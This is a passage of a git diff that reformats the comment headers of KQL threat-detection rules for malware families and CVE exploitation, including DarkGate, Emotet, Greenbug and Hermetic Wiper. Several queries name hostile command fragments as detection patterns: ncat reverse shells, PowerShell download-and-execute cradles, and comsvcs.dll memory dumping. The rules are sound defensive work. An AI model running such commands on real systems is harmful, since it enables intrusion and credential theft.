ae1712b0..92b68a1a 100644 --- a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql +++ b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql @@ -1,14 +1,14 @@ -// Title: DarkGate - Autoit3.EXE Execution Parameters -// Author: Micah Babinski -// Date: 2023-10-15 -// Level: high -// Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within -// the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate -// command-and-control server. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: DarkGate - Autoit3.EXE Execution Parameters +// Author: Micah Babinski +// Date: 2023-10-15 +// Level: high +// Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within +// the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate +// command-and-control server. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe") and (FolderPath endswith "\\Autoit3.exe" or ProcessVersionInfoOriginalFileName =~ "AutoIt3.exe")) and (not((FolderPath endswith ":\\Program Files (x86)\\AutoIt3\\AutoIt3.exe" or FolderPath endswith ":\\Program Files\\AutoIt3\\AutoIt3.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql b/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql index 3f1f3a5c..75a2994d 100644 --- a/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql +++ b/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql @@ -1,12 +1,12 @@ -// Title: DarkGate - Drop DarkGate Loader In C:\Temp Directory -// Author: Tomasz Dyduch, Josh Nickels -// Date: 2024-05-31 -// Level: medium -// Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, detection.emerging-threats -// False Positives: -// - Unlikely legitimate usage of AutoIT in temp folders. - -DeviceFileEvents +// Title: DarkGate - Drop DarkGate Loader In C:\Temp Directory +// Author: Tomasz Dyduch, Josh Nickels +// Date: 2024-05-31 +// Level: medium +// Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.emerging-threats +// False Positives: +// - Unlikely legitimate usage of AutoIT in temp folders. + +DeviceFileEvents | where (FolderPath contains ":\\temp\\" and (FolderPath endswith ".au3" or FolderPath endswith "\\autoit3.exe")) or (InitiatingProcessFolderPath contains ":\\temp\\" and (InitiatingProcessFolderPath endswith ".au3" or InitiatingProcessFolderPath endswith "\\autoit3.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql b/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql index 06adb4ca..8096e68e 100644 --- a/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql +++ b/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql @@ -1,12 +1,12 @@ -// Title: DarkSide Ransomware Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2021-05-14 -// Level: critical -// Description: Detects DarkSide Ransomware and helpers -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204, detection.emerging-threats -// False Positives: -// - UAC bypass method used by other malware - -DeviceProcessEvents +// Title: DarkSide Ransomware Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-14 +// Level: critical +// Description: Detects DarkSide Ransomware and helpers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, detection.emerging-threats +// False Positives: +// - UAC bypass method used by other malware + +DeviceProcessEvents | where (ProcessCommandLine contains "=[char][byte]('0x'+" or ProcessCommandLine contains " -work worker0 -path ") or (FolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessCommandLine contains "DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql index 3b087bd4..2ba18f53 100644 --- a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql +++ b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql @@ -1,12 +1,12 @@ -// Title: Diamond Sleet APT File Creation Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-24 -// Level: high -// Description: Detects file creation activity that is related to Diamond Sleet APT activity -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Diamond Sleet APT File Creation Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects file creation activity that is related to Diamond Sleet APT activity +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith ":\\ProgramData\\4800-84DC-063A6A41C5C" or FolderPath endswith ":\\ProgramData\\clip.exe" or FolderPath endswith ":\\ProgramData\\DSROLE.dll" or FolderPath endswith ":\\ProgramData\\Forest64.exe" or FolderPath endswith ":\\ProgramData\\readme.md" or FolderPath endswith ":\\ProgramData\\Version.dll" or FolderPath endswith ":\\ProgramData\\wsmprovhost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql index 62380147..c360500b 100644 --- a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql +++ b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql @@ -1,12 +1,12 @@ -// Title: Diamond Sleet APT Process Activity Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-24 -// Level: high -// Description: Detects process creation activity indicators related to Diamond Sleet APT -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Diamond Sleet APT Process Activity Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects process creation activity indicators related to Diamond Sleet APT +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains " uTYNkfKxHiZrx3KJ" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql b/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql index 64ec2a68..d9a4601f 100644 --- a/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql +++ b/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql @@ -1,10 +1,10 @@ -// Title: Droppers Exploiting CVE-2017-11882 -// Author: Florian Roth (Nextron Systems) -// Date: 2017-11-23 -// Level: critical -// Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-11882, detection.emerging-threats - -DeviceProcessEvents +// Title: Droppers Exploiting CVE-2017-11882 +// Author: Florian Roth (Nextron Systems) +// Date: 2017-11-23 +// Level: critical +// Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-11882, detection.emerging-threats + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql b/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql index e6e47dcf..d96919dd 100644 --- a/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql +++ b/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql @@ -1,12 +1,12 @@ -// Title: Elise Backdoor Activity -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2018-01-31 -// Level: critical -// Description: Detects Elise backdoor activity used by APT32 -// MITRE Tactic: Execution -// Tags: attack.g0030, attack.g0050, attack.s0081, attack.execution, attack.t1059.003, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Elise Backdoor Activity +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-01-31 +// Level: critical +// Description: Detects Elise backdoor activity used by APT32 +// MITRE Tactic: Execution +// Tags: attack.g0030, attack.g0050, attack.s0081, attack.execution, attack.t1059.003, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "\\Windows\\Caches\\NavShExt.dll" and ProcessCommandLine contains "/c del") or FolderPath endswith "\\Microsoft\\Network\\svchost.exe") or (ProcessCommandLine contains ",Setting" and (ProcessCommandLine endswith "\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll" or ProcessCommandLine endswith "\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql index 35f50aec..82e4a93b 100644 --- a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql +++ b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql @@ -1,13 +1,13 @@ -// Title: Emotet Loader Execution Via .LNK File -// Author: @kostastsale -// Date: 2022-04-22 -// Level: high -// Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. -// The ".lnk" file was delivered via phishing campaign. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.006, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Emotet Loader Execution Via .LNK File +// Author: @kostastsale +// Date: 2022-04-22 +// Level: high +// Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. +// The ".lnk" file was delivered via phishing campaign. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "findstr" and ProcessCommandLine contains ".vbs" and ProcessCommandLine contains ".lnk") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql index f24372fd..490fe1d9 100644 --- a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql +++ b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql @@ -1,12 +1,12 @@ -// Title: Exploit for CVE-2017-0261 -// Author: Florian Roth (Nextron Systems) -// Date: 2018-02-22 -// Level: medium -// Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-0261, detection.emerging-threats -// False Positives: -// - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders) - -DeviceProcessEvents +// Title: Exploit for CVE-2017-0261 +// Author: Florian Roth (Nextron Systems) +// Date: 2018-02-22 +// Level: medium +// Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-0261, detection.emerging-threats +// False Positives: +// - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders) + +DeviceProcessEvents | where FolderPath contains "\\FLTLDR.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql index cc1e35fb..9cd70a63 100644 --- a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql +++ b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql @@ -1,10 +1,10 @@ -// Title: Exploit for CVE-2017-8759 -// Author: Florian Roth (Nextron Systems) -// Date: 2017-09-15 -// Level: critical -// Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-8759, detection.emerging-threats - -DeviceProcessEvents +// Title: Exploit for CVE-2017-8759 +// Author: Florian Roth (Nextron Systems) +// Date: 2017-09-15 +// Level: critical +// Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-8759, detection.emerging-threats + +DeviceProcessEvents | where FolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql index 142431b5..08ee0c7b 100644 --- a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql +++ b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql @@ -1,13 +1,13 @@ -// Title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process -// Author: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-31 -// Level: high -// Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe. -// This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats -// False Positives: -// - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\network service`), or parent process command lines to reduce noise. - -DeviceProcessEvents +// Title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process +// Author: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-31 +// Level: high +// Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe. +// This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats +// False Positives: +// - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\network service`), or parent process command lines to reduce noise. + +DeviceProcessEvents | where ((InitiatingProcessCommandLine contains "WsusPool" and InitiatingProcessFolderPath endswith "\\w3wp.exe") or InitiatingProcessFolderPath endswith "\\wsusservice.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql b/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql index eab81083..2db1b864 100644 --- a/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql +++ b/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql @@ -1,10 +1,10 @@ -// Title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC -// Author: @Kostastsale, TheDFIRReport -// Date: 2022-02-12 -// Level: high -// Description: Detects the execution of the commonly used ZeroLogon PoC executable. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.lateral-movement, attack.t1210, cve.2020-1472, detection.emerging-threats - -DeviceProcessEvents +// Title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-02-12 +// Level: high +// Description: Detects the execution of the commonly used ZeroLogon PoC executable. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1210, cve.2020-1472, detection.emerging-threats + +DeviceProcessEvents | where ((ProcessCommandLine contains "Administrator" and ProcessCommandLine contains "-c") and (FolderPath endswith "\\cool.exe" or FolderPath endswith "\\zero.exe") and InitiatingProcessFolderPath endswith "\\cmd.exe") and ((ProcessCommandLine contains "taskkill" and ProcessCommandLine contains "/f" and ProcessCommandLine contains "/im") or ProcessCommandLine contains "powershell") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql b/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql index 8207429f..d809f987 100644 --- a/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql +++ b/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql @@ -1,12 +1,12 @@ -// Title: FakeUpdates/SocGholish Activity -// Author: @kostastsale -// Date: 2022-06-16 -// Level: high -// Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: FakeUpdates/SocGholish Activity +// Author: @kostastsale +// Date: 2022-06-16 +// Level: high +// Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessCommandLine contains "Chrome" or InitiatingProcessCommandLine contains "Edge" or InitiatingProcessCommandLine contains "Firefox" or InitiatingProcessCommandLine contains "Opera" or InitiatingProcessCommandLine contains "Brave" or InitiatingProcessCommandLine contains "Vivaldi") and (InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" and InitiatingProcessCommandLine contains ".zip" and InitiatingProcessCommandLine contains "update" and InitiatingProcessCommandLine contains ".js") and InitiatingProcessFolderPath endswith "\\wscript.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql index 3c133795..e28c09b4 100644 --- a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql +++ b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql @@ -1,12 +1,12 @@ -// Title: File Creation Related To RAT Clients -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024-12-19 -// Level: high -// Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild. -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Legitimate software creating a file with the same name - -DeviceFileEvents +// Title: File Creation Related To RAT Clients +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-12-19 +// Level: high +// Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild. +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Legitimate software creating a file with the same name + +DeviceFileEvents | where FolderPath contains "\\AppData\\Roaming\\" and ((FolderPath contains "\\mydata\\" or FolderPath contains "\\datalogs\\" or FolderPath contains "\\hvnc\\" or FolderPath contains "\\dcrat\\") and (FolderPath endswith "\\datalogs.conf" or FolderPath endswith "\\hvnc.conf" or FolderPath endswith "\\dcrat.conf")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql b/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql index ae2317ff..a008eaeb 100644 --- a/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql +++ b/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql @@ -1,10 +1,10 @@ -// Title: Fireball Archer Install -// Author: Florian Roth (Nextron Systems) -// Date: 2017-06-03 -// Level: high -// Description: Detects Archer malware invocation via rundll32 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218.011, detection.emerging-threats - -DeviceProcessEvents +// Title: Fireball Archer Install +// Author: Florian Roth (Nextron Systems) +// Date: 2017-06-03 +// Level: high +// Description: Detects Archer malware invocation via rundll32 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "InstallArcherSvc" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql b/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql index 7e07a4b4..50561a0f 100644 --- a/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql +++ b/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql @@ -1,12 +1,12 @@ -// Title: Goofy Guineapig Backdoor IOC -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-14 -// Level: high -// Description: Detects malicious indicators seen used by the Goofy Guineapig malware -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Goofy Guineapig Backdoor IOC +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-14 +// Level: high +// Description: Detects malicious indicators seen used by the Goofy Guineapig malware +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath in~ ("C:\\ProgramData\\GoogleUpdate\\config.dat", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate\\tmp.bat", "C:\\ProgramData\\GoogleUpdate\\goopdate.dll") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql b/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql index 3abe5dce..3dc358a5 100644 --- a/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql +++ b/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql @@ -1,12 +1,12 @@ -// Title: Greenbug Espionage Group Indicators -// Author: Florian Roth (Nextron Systems) -// Date: 2020-05-20 -// Level: critical -// Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec -// MITRE Tactic: Execution -// Tags: attack.g0049, attack.execution, attack.t1059.001, attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1036.005, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Greenbug Espionage Group Indicators +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-20 +// Level: critical +// Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec +// MITRE Tactic: Execution +// Tags: attack.g0049, attack.execution, attack.t1059.001, attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1036.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith ":\\ProgramData\\adobe\\Adobe.exe" or FolderPath endswith ":\\ProgramData\\oracle\\local.exe" or FolderPath endswith "\\revshell.exe" or FolderPath endswith "\\infopagesbackup\\ncat.exe" or FolderPath endswith ":\\ProgramData\\comms\\comms.exe") or (ProcessCommandLine contains "-ExecutionPolicy Bypass -File" and ProcessCommandLine contains "\\msf.ps1") or (ProcessCommandLine contains "infopagesbackup" and ProcessCommandLine contains "\\ncat" and ProcessCommandLine contains "-e cmd.exe") or ProcessCommandLine contains "L3NlcnZlcj1" or (ProcessCommandLine contains "system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill" or ProcessCommandLine contains "-nop -w hidden -c $k=new-object" or ProcessCommandLine contains "[Net.CredentialCache]::DefaultCredentials;IEX " or ProcessCommandLine contains " -nop -w hidden -c $m=new-object net.webclient;$m" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass whoami" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass netstat -a") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql b/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql index 892bdc57..1a12b33a 100644 --- a/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql +++ b/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql @@ -1,12 +1,12 @@ -// Title: Griffon Malware Attack Pattern -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-09 -// Level: critical -// Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Griffon Malware Attack Pattern +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-09 +// Level: critical +// Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "\\local\\temp\\" and ProcessCommandLine contains "//b /e:jscript" and ProcessCommandLine contains ".txt" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql b/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql index bc79ef77..e99facbe 100644 --- a/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql +++ b/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql @@ -1,10 +1,10 @@ -// Title: Hermetic Wiper TG Process Patterns -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-25 -// Level: high -// Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.lateral-movement, attack.t1021.001, detection.emerging-threats - -DeviceProcessEvents +// Title: Hermetic Wiper TG Process Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1021.001, detection.emerging-threats + +DeviceProcessEvents | where FolderPath endswith "\\policydefinitions\\postgresql.exe" or ((ProcessCommandLine contains "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp" or ProcessCommandLine contains " 1> \\\\127.0.0.1\\ADMIN$\\__16") or (ProcessCommandLine contains "powershell -c " and ProcessCommandLine contains "\\comsvcs.dll MiniDump " and ProcessCommandLine contains "\\winupd.log full")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql b/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql index deb455f1..4da9174c 100644 --- a/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql +++ b/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql @@ -1,12 +1,12 @@ -// Title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution -// Author: Arda Buyukkaya (EclecticIQ) -// Date: 2025-02-11 -// Level: high -// Description: Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.command-and-control, attack.t1090, attack.t1573, attack.t1071.001, attack.t1059.001, attack.s0183, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution +// Author: Arda Buyukkaya (EclecticIQ) +// Date: 2025-02-11 +// Level: high +// Description: Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.command-and-control, attack.t1090, attack.t1573, attack.t1071.001, attack.t1059.001, attack.s0183, detection.emerging-threats +// False Positives: +// - Unlikely + 